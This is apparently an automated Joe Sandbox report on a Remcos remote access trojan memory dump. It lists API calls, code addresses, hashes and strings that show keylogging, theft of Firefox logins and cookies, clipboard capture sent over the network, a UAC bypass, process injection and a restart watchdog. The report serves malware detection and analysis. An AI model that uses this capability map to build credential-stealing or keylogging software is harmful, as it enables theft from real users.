                                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                        • OpenMutexA.KERNEL32 ref: 00412146
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`2U$fsutil.exe$rmclient.exe$svchost.exe
                                                                        • API String ID: 3018269243-386443670
                                                                        • Opcode ID: 2d0f795493d6dd0f1c0ae32495555cdb290ac7a8c9bea9647889ea0ebcc72388
                                                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                        • Opcode Fuzzy Hash: 2d0f795493d6dd0f1c0ae32495555cdb290ac7a8c9bea9647889ea0ebcc72388
                                                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                        • API String ID: 1164774033-3681987949
                                                                        • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                        • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 004168C2
                                                                        • EmptyClipboard.USER32 ref: 004168D0
                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                        • GlobalLock.KERNEL32 ref: 004168F9
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                        • SetClipboardData.USER32 ref: 00416938
                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                        • GetClipboardData.USER32 ref: 0041696C
                                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                        • String ID: !D@
                                                                        • API String ID: 3520204547-604454484
                                                                        • Opcode ID: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                        • Opcode Fuzzy Hash: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,@5U,?,00475338), ref: 0040F48E
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                        • String ID: @5U$C:\Program Files(x86)\Internet Explorer\$Inj$`2U$ieinstal.exe$ielowutil.exe
                                                                        • API String ID: 3756808967-1396632913
                                                                        • Opcode ID: 9696b3c9821f35113208a8e204aa4700f224166d16ac1652e85869771ea54990
                                                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                        • Opcode Fuzzy Hash: 9696b3c9821f35113208a8e204aa4700f224166d16ac1652e85869771ea54990
                                                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$File$FirstNext
                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 3527384056-432212279
                                                                        • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                        • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                        APIs
                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                        • String ID:
                                                                        • API String ID: 297527592-0
                                                                        • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                        • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                                        • API String ID: 0-1861860590
                                                                        • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                        • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C2EC
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C31C
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C38E
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C39B
                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C371
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3BC
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D2
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D9
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                        • String ID: `2U
                                                                        • API String ID: 2341273852-1105716024
                                                                        • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                        • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00407521
                                                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object_wcslen
                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                        • API String ID: 240030777-3166923314
                                                                        • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                        • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                        APIs
                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 3587775597-0
                                                                        • Opcode ID: 4d7e07cc6e00c0f0dc0cba18b78b11ddb9a145c181d83e8bc9a999359985f1ce
                                                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                        • Opcode Fuzzy Hash: 4d7e07cc6e00c0f0dc0cba18b78b11ddb9a145c181d83e8bc9a999359985f1ce
                                                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                        • String ID: lJD$lJD$lJD
                                                                        • API String ID: 745075371-479184356
                                                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 1164774033-405221262
                                                                        • Opcode ID: 4ae1af847c86cfc22abb557c668e09cb8c114ad66c721bf11deb43d1aacda498
                                                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                        • Opcode Fuzzy Hash: 4ae1af847c86cfc22abb557c668e09cb8c114ad66c721bf11deb43d1aacda498
                                                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Find$CreateFirstNext
                                                                        • String ID: 8SG$@5U$PXG$PXG$NG
                                                                        • API String ID: 341183262-3945603504
                                                                        • Opcode ID: a26c75fc68054aa2cc48b03a60bc0a22f930587166dfe62aa5b6b677dfbb1f5b
                                                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                        • Opcode Fuzzy Hash: a26c75fc68054aa2cc48b03a60bc0a22f930587166dfe62aa5b6b677dfbb1f5b
                                                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • GetMessageA.USER32 ref: 0040A33B
                                                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                                                        • DispatchMessageA.USER32 ref: 0040A355
                                                                        Strings
                                                                        • Keylogger initialization failure: error , xrefs: 0040A301
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                        • String ID: Keylogger initialization failure: error
                                                                        • API String ID: 3219506041-952744263
                                                                        • Opcode ID: 83cf61fcc4db7adf9d4bbc8500479a2a59ba994a5a836eeaba27c80e8cfaac76
                                                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                        • Opcode Fuzzy Hash: 83cf61fcc4db7adf9d4bbc8500479a2a59ba994a5a836eeaba27c80e8cfaac76
                                                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                        • String ID:
                                                                        • API String ID: 1888522110-0
                                                                        • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                        • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                        • API String ID: 2127411465-314212984
                                                                        • Opcode ID: 45c2350e7e295625bd4dac20ddbecf348a3a6cbee010952884366c1c3e89a588
                                                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                        • Opcode Fuzzy Hash: 45c2350e7e295625bd4dac20ddbecf348a3a6cbee010952884366c1c3e89a588
                                                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00449212
                                                                        • _free.LIBCMT ref: 00449236
                                                                        • _free.LIBCMT ref: 004493BD
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                        • _free.LIBCMT ref: 00449589
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 314583886-0
                                                                        • Opcode ID: a0df98c9171fe928957a71b0f613fe22cde1b567892c52a540cd8d6d0b3e47ec
                                                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                        • Opcode Fuzzy Hash: a0df98c9171fe928957a71b0f613fe22cde1b567892c52a540cd8d6d0b3e47ec
                                                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                        APIs
                                                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
